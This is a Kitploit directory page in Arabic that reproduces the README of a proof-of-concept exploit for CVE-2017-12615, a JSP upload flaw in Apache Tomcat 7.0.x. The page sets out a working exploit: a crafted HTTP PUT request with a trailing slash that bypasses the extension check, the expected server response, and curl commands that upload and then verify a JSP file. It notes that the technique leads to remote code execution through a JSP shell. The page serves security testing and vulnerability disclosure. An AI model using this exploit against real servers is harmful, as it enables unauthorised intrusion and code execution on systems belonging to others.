Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-12615 — استغلال POC لثغرة PUT JSP في Apache Tomcat 7.0.x (CVE-2017-12615) | Kitploit
أدوات/GitHubGitHub/breaktoprotect/cve-2017-12615
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubbreaktoprotect/cve-2017-12615

CVE-2017-12615

استغلال POC لثغرة PUT JSP في Apache Tomcat 7.0.x (CVE-2017-12615)

عرض المستودع
11221منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

في ذكرى تشيا جونيوان (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

استغلال POC لأباتشي تومكات 7.0.0 إلى 7.0.79 على ويندوز؛ ثغرة CVE-2017-12615 PUT JSP.

الوصف:

حسب التصميم، لا يُسمح لك برفع ملفات JSP عبر طريقة PUT على خوادم أباتشي تومكات. من المحتمل أن يكون هذا إجراءً أمنيًا لمنع المهاجم من رفع شيل JSP والحصول على تنفيذ تعليمات برمجية عن بُعد على الخادم. ومع ذلك، نظرًا لعدم كفاية الفحوصات، يمكن للمهاجم الحصول على تنفيذ تعليمات برمجية عن بُعد على خوادم تومكات 7.0.{0 إلى 79} التي تم تمكين PUT عليها عن طريق طلب طريقة PUT على خادم تومكات باستخدام طلب HTTP مصمم خصيصًا. لكن بجدية، خاص؟ من فضلك.

طريقة الاستغلال:

عن طريق إضافة حرف '/' خلف امتداد اسم الملف، يمكن تجاوز فحص امتداد الملف. هذا كل شيء. لذا، ليس بهذه الخصوصية في الواقع.

الاستغلال بطريقة الطلب:

الطلب

root@kitploit:~
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

الرد المتوقع إذا نجح

root@kitploit:~
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

الاستغلال باستخدام 'curl':

  1. أنشئ ملف .jsp (مثل test.jsp):
root@kitploit:~
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. نفذ أمر curl على الخادم الهدف:
root@kitploit:~
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. تحقق من رفع ملفك عن طريق التصفح إلى العنوان الهدف أو:
root@kitploit:~
curl http://target-host-or-ip-address:port/test.jsp
تنزيل الأداة